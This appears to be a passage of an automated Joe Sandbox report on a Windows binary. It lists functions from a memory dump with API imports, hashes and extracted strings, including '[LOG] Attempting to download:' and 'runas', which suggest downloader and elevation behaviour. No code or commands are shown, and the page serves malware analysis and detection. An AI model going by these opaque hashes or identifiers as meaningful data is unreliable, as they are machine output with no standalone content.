Opcode ID: a0e0d6f874318b95d2a660cd5702e84df59258e83301c24edbe5ec261facb81b
Instruction ID: 743fd3a30121ab03bac1c04cc1cb8f57b32e2684a6ab3972d115ebf75b5c3551
Opcode Fuzzy Hash: a0e0d6f874318b95d2a660cd5702e84df59258e83301c24edbe5ec261facb81b
Instruction Fuzzy Hash: 3632A872A18BC581DBA0EB15E0403BEA7A1FF84B94F984132EA5D8B798DF3CE454D750

Function 00007FF75F8EB640 Relevance: 4.8, APIs: 2, Instructions: 2318stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F8EB7A1

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 997f0a936e5c3eac6869c3b538b808baadb5631156a39cee0f08e1937ac41602
Instruction ID: 51ee411b7bfcd7f12f1a1e93b06501b80fba6ec270dc93b4367f5f87cc668a32
Opcode Fuzzy Hash: 997f0a936e5c3eac6869c3b538b808baadb5631156a39cee0f08e1937ac41602
Instruction Fuzzy Hash: 0423A132A08BD585EB609B25E4403AEB7A0F785B90F494239DF9D4BB98DF3CE464D710

Function 00007FF75F8D2A00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF75F8D2AC6

Part of subcall function 00007FF75F8C0A50: GetCurrentProcess.KERNEL32 ref: 00007FF75F8C0A80
Part of subcall function 00007FF75F8C0A50: TerminateProcess.KERNEL32 ref: 00007FF75F8C0A8E

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF75F8D2A06, 00007FF75F8D2B05
0123456789, xrefs: 00007FF75F8D2A18

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Process$CurrentTerminatememcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$0123456789
API String ID: 1371612482-1546912705
Opcode ID: 7c6c98690167acf3bf60cc988cabdca1b0ee90e96ea5e436e7499d82ebcff732
Instruction ID: 9100316005ca5b39ab50290fcbf6e547dddf3b5e6d3c5a536f961a36a8380bfd
Opcode Fuzzy Hash: 7c6c98690167acf3bf60cc988cabdca1b0ee90e96ea5e436e7499d82ebcff732
Instruction Fuzzy Hash: 2C21F513F14AD498EB15AF6AA8006F9AB60EB09FD4F8C4172EE0D47784DE38E156D310

Function 00007FF75F8F2670 Relevance: 4.5, APIs: 2, Instructions: 1963COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF75F8F27CA

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-0
Opcode ID: 76c896bd3406ca3412a63405060ae6a04ef35f28b4929a195492a2a7c87a08f0
Instruction ID: ae6501180c870ea3d1d3d55a3548aa66176400654cc1c70b13c81c07edc08e63
Opcode Fuzzy Hash: 76c896bd3406ca3412a63405060ae6a04ef35f28b4929a195492a2a7c87a08f0
Instruction Fuzzy Hash: 05139336A08BC589EB609F25E4402EEB761FB94B84F984131DE8D4B7A8DF3CE465D710

Function 00007FF75F8FDC00 Relevance: 4.2, Strings: 3, Instructions: 408COMMON

Download Yara Rule

Strings

basic_string::append, xrefs: 00007FF75F8FE008, 00007FF75F8FE11E
%.*Lf, xrefs: 00007FF75F8FE397, 00007FF75F8FE401
, xrefs: 00007FF75F8FDC74

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: memcpy$memset
String ID: $%.*Lf$basic_string::append
API String ID: 438689982-2012992446
Opcode ID: bca549807d1ef980c2b12770d4f979dabea5589e405c08ee8a6228ae0a2d3668
Instruction ID: 3a75e752bbea0fb6bc0a53236dc9e09bfdb2ae400f8e7e4c2c8e8432ddc02158
Opcode Fuzzy Hash: bca549807d1ef980c2b12770d4f979dabea5589e405c08ee8a6228ae0a2d3668
Instruction Fuzzy Hash: BDF19032B18BD185EB20AB65E8402EEB760FB94B94F884136EE8D57B59CF3CE055D710

Function 00007FF75F8FC490 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 605COMMON

Download Yara Rule

Strings

%.*Lf, xrefs: 00007FF75F8FCC07, 00007FF75F8FCC6C

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: %.*Lf
API String ID: 0-1110018102
Opcode ID: d3faa18358e3ee66ebf8e9fdb0c49b3966e2885cbbf1d59917e2a1e5342b36d9
Instruction ID: 4ad28b4e41035b0ae48aebf33f20b810fe849d501d50659e9770066655d763e8
Opcode Fuzzy Hash: d3faa18358e3ee66ebf8e9fdb0c49b3966e2885cbbf1d59917e2a1e5342b36d9
Instruction Fuzzy Hash: CF326736A18BC585D760AF66E8402EEB760F789B94F884126EECC47B59CF3CE155CB10

Function 00007FF75F900500 Relevance: 3.2, APIs: 2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: ___lc_codepage_func___mb_cur_max_func
String ID:
API String ID: 1180276535-0
Opcode ID: 746a0945fdf0675ec05b464090809c7fd23beabf8f6feda5459e56e920a212a9
Instruction ID: b887abeca048bb0d0e760a86c3f7058c01719489109cd2d7337e6b9acdbee6a7
Opcode Fuzzy Hash: 746a0945fdf0675ec05b464090809c7fd23beabf8f6feda5459e56e920a212a9
Instruction Fuzzy Hash: E381F962B19EC585DA60AF1698045FAE758BB487F4F8C4631EEAC873D8EF3CD4418710

Function 00007FF75F98DE50 Relevance: 2.6, Strings: 2, Instructions: 104COMMON

Download Yara Rule

Strings

[LOG] Attempting to download: , xrefs: 00007FF75F98DE97
basic_ios::clear, xrefs: 00007FF75F98DE75

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: [LOG] Attempting to download: $basic_ios::clear
API String ID: 0-3882351015
Opcode ID: 983f3405aebac6bce00d5b358cb46023571b4bdf438229fca59116f1149268e0
Instruction ID: 7546938099a6e905ca40107e655d92ad826ff9068b305007ab97fd1d902cd8b0
Opcode Fuzzy Hash: 983f3405aebac6bce00d5b358cb46023571b4bdf438229fca59116f1149268e0
Instruction Fuzzy Hash: 6B317592B19A8594EA59BF16D4452F9A321AF85FC4F9C8436ED0D4B79ECF2CE046C320

Function 00007FF75F8B157F Relevance: 2.5, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

runas, xrefs: 00007FF75F8B15C6
Erreur, xrefs: 00007FF75F8B1603

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: Erreur$runas
API String ID: 0-3124304494
Opcode ID: 037dfdd6a7b096566790e447aeec506ffb1d441ae168086e2b92bb95e24b9cd8
Instruction ID: e1b11eac04608033e7082700c28f42436ef1c44afecf5603fe8d5d238708d575
Opcode Fuzzy Hash: 037dfdd6a7b096566790e447aeec506ffb1d441ae168086e2b92bb95e24b9cd8
Instruction Fuzzy Hash: CE119171B19F8589FB90AB61EC543E863A5FB45784F98003ACA0C9B768DF3CE545C760

Function 00007FF75F8F1460 Relevance: 2.3, APIs: 1, Instructions: 1097COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF75F8F16A2

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-0
Opcode ID: b5b4bc736404f223d6c3b5f534896595c998051c2165f619660560face98bcc5
Instruction ID: 2fe73d923dac7667e27db3f51f21701226e600968f58cb0640cb2f8461b4d074
Opcode Fuzzy Hash: b5b4bc736404f223d6c3b5f534896595c998051c2165f619660560face98bcc5
Instruction Fuzzy Hash: 13B29C32B18F9189EB209B69D4442FC77B0FB54B84F984522DE8D17798DF38E8A2D750

Function 00007FF75F8EA480 Relevance: 2.3, APIs: 1, Instructions: 1086stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F8EA6A3

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: bbed0aab40a03dd5a56a97af2c94f09c58a8dd5a514657e17f0ea7627db2c5cf
Instruction ID: 98bd25101ea3016856f1253afc03c3a9642ad2e838c3f758d4b88c598a184b37
Opcode Fuzzy Hash: bbed0aab40a03dd5a56a97af2c94f09c58a8dd5a514657e17f0ea7627db2c5cf
Instruction Fuzzy Hash: 51B29B32A08B9185EB209B65D4443AC77B0F748BA4F59867ACFAD57B98CF3CE851D310

Function 00007FF75F901160 Relevance: 2.2, APIs: 1, Instructions: 1000COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dcdb0a408daafb29028e784a419d5f8deadc5394643995bbffb94bdf45834a9
Instruction ID: 760476151337a85bd429a7cf8e8fbf15af73aab996942dbb26e0df6fac738e0e
Opcode Fuzzy Hash: 7dcdb0a408daafb29028e784a419d5f8deadc5394643995bbffb94bdf45834a9
Instruction Fuzzy Hash: B9A2842260CAD185E7649A2990403AEFBA5F785BA4F584235DB9D83BE8CF7CD4948B10

Function 00007FF75F9024B0 Relevance: 2.2, APIs: 1, Instructions: 982COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58d65cf8065fe990f2c688e16615a0b9efd66875e171791f71746ca70f5a13a
Instruction ID: 66e0f04202acf3353588cd0412f5c57f5ef45e13b31003ab13fc37e54525b721
Opcode Fuzzy Hash: d58d65cf8065fe990f2c688e16615a0b9efd66875e171791f71746ca70f5a13a
Instruction Fuzzy Hash: 1CA2C52260CFC185E7709A2990443AEFBA5F786BA4F584235DB9D83BD8CF7DE4548B10

Function 00007FF75F9037D0 Relevance: 2.2, APIs: 1, Instructions: 976COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d791405aacb919d4263b5714a13f572361568e368835af5ccba946ec856f9e7
Instruction ID: 27bcf2977f9a32787974cf5290c90f72c8dc80390e064bc9052130880f6f12e1
Opcode Fuzzy Hash: 5d791405aacb919d4263b5714a13f572361568e368835af5ccba946ec856f9e7
Instruction Fuzzy Hash: 34A2A26260CED185E7749A29A0403AEFBA4F781BA4F584235DBDD83BD8CF7DD4548B20

Function 00007FF75F904AE0 Relevance: 2.2, APIs: 1, Instructions: 975COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4509387bb9c32b6876ae089fc136afa09a815a373c11641d040fd0c2cf1ef54
Instruction ID: 9dfb45e1e2d4328be5c33213261b29f6392f19077a879fcf35767b2c09a93980
Opcode Fuzzy Hash: d4509387bb9c32b6876ae089fc136afa09a815a373c11641d040fd0c2cf1ef54
Instruction Fuzzy Hash: 88A2942260CBD1C5E7709A2990443AEFBA4F785BA4F984235DB9D83BD8CF7CD4549B20

Function 00007FF75F905E00 Relevance: 2.2, APIs: 1, Instructions: 961COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615b3e26cb42071c26fb225ef7005749b09b0aed456080411f3c064c748998d9
Instruction ID: 2d60fa51a703e7d7954f59ca22784c581e02c77b4cf7deacfd2036419cb5b481
Opcode Fuzzy Hash: 615b3e26cb42071c26fb225ef7005749b09b0aed456080411f3c064c748998d9
Instruction Fuzzy Hash: F2A2A22260CFD185E7709A2AA0443AEEBA5F781BA4F584235DB9D83BD9CF7CD454CB10

Function 00007FF75F8E8CD0 Relevance: 2.2, Strings: 1, Instructions: 948COMMON

Download Yara Rule

Strings

c, xrefs: 00007FF75F8E9247

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen
String ID: c
API String ID: 39653677-112844655
Opcode ID: 809b7d1d86638f844ac246aba48d4e44245e5d62022d91d7326554643c2608a7
Instruction ID: 4f7ea939b655615e58079b8f9fff94bb4ba015a80b17a3fa62b4a587ffd3c167
Opcode Fuzzy Hash: 809b7d1d86638f844ac246aba48d4e44245e5d62022d91d7326554643c2608a7
Instruction Fuzzy Hash: 3F929F32608BC586EB609F25E4407AAB7A2F785790F580139EFAD477A8DF7CE460D710

Function 00007FF75F8F0080 Relevance: 2.0, Strings: 1, Instructions: 787COMMON

Download Yara Rule

Strings

c, xrefs: 00007FF75F8F05C0

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: wcslen
String ID: c
API String ID: 4088430540-112844655
Opcode ID: 0d242d407649b839329bdf5135c751a417367705ca84fb9fc8c210f504af3f76
Instruction ID: 11f8cb87be4dd4a5bc7633a4fee863a4590a3a3f14a7d174a694b2bce48d2b7b
Opcode Fuzzy Hash: 0d242d407649b839329bdf5135c751a417367705ca84fb9fc8c210f504af3f76
Instruction Fuzzy Hash: A8727136619BC589E7609F25E4406AEBBA0F795B80F984031EECD477A8DF3CE461D710

Function 00007FF75F8D1540 Relevance: 1.9, APIs: 1, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9163f786d8b4aa6d01a90728f727ed4ec4685c13e1463792fef3bbe3c80a5566
Instruction ID: 5a3d959d1051fa099084017640cfc0f2eda206c7a9d8595658f157c18e342fb4
Opcode Fuzzy Hash: 9163f786d8b4aa6d01a90728f727ed4ec4685c13e1463792fef3bbe3c80a5566
Instruction Fuzzy Hash: DA029522A1DBC141FAA1AB55A4003FAE7A1EF857C4F9C4036DE8D8BB95DE3CF454A710

Function 00007FF75F916B90 Relevance: 1.9, Strings: 1, Instructions: 684COMMON

Download Yara Rule

Strings

A, xrefs: 00007FF75F917D57

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
